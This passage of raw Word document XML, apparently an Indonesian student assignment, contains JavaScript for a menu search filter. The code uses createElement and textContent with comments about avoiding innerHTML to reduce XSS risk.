                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  ];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546BDDE2" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="492C12B3" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  const inputSearch = document.querySelector("#searchBox");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD63093" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  const listHasil = document.querySelector("#hasilList");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46123F2F" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  const infoJumlah = document.querySelector("#infoJumlah");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="450EC85D" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63296CE7" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // menghapus daftar sebelum menampilkan hasil baru</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4743C0F2" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // removeChild digunakan karena innerHTML tidak boleh digunakan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D4DD464" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  function bersihinList() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD9B6F3" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    while (listHasil.firstChild) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="244C7214" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      listHasil.removeChild(listHasil.firstChild);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23C12F07" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4535D724" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D8B5160" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BDACCA" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // fungsi utama untuk menampilkan kembali daftar menu</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B9A7DDA" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // createElement dan textContent digunakan untuk mengurangi risiko XSS (lihat Soal 2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10DADE14" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  function gambarUlangList(menuYangKetampil) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37865C7D" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    bersihinList();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3896FC3B" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    menuYangKetampil.forEach((menu) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13572E97" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      const itemBaru = document.createElement("li");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A31174" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      itemBaru.textContent = menu;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E14445" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      listHasil.appendChild(itemBaru);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2104B63A" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CCF9A86" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    infoJumlah.textContent = "Menampilkan " + menuYangKetampil.length + " dari " + daftarMenu.length + " menu";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5367DD25" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529BC5CF" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D006938" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // setiap input langsung diproses menggunakan array.filter tanpa menunggu pengguna menekan Enter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53D16D13" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  inputSearch.addEventListener("input", (e) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="245242AD" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    const kataKunci = e.target.value.trim().toLowerCase();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02D4B959" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    const hasilFilter = daftarMenu.filter((menu) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D73E49" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      return menu.toLowerCase().includes(kataKunci);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D7D3DC8" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68B7E22B" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    gambarUlangList(hasilFilter);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="716C7485" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68BEF78B" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="012B78A0" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  // saat halaman pertama kali dibuka, tampilkan seluruh menu</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BBF3F87" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  gambarUlangList(daftarMenu);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F52117" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41036F1C" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BCA5379" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BF11BAD" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BBFAA11" w14:textId="77777777" w:rsidR="004C3256" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09E48653" w14:textId="77777777" w:rsidR="00FF450C" w:rsidRDefault="00FF450C"/>
    <w:sectPr w:rsidR="00FF45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103E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3B8B0BC"/>
    <w:lvl w:ilvl="0" w:tplc="C61CB2C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7DDE1EF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5A280C8E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F3E64E2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7B249CA8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5B346B96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F23EC6A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4970B86C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="797E6194">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="19379076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56"/>
    <w:rsid w:val="004C3256"/>
    <w:rsid w:val="00AE7333"/>
    <w:rsid w:val="00B055F3"/>
    <w:rsid w:val="00B70371"/>
    <w:rsid w:val="00FF45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4B8911E"/>
  <w15:docId w15:val="{3BE6A75F-3981-994C-86EB-D3C20E68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814</Words>
  <Characters>5663</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>145</Lines>
  <Paragraphs>109</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Izhar Dwiputra</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-22T08:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-22T09:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>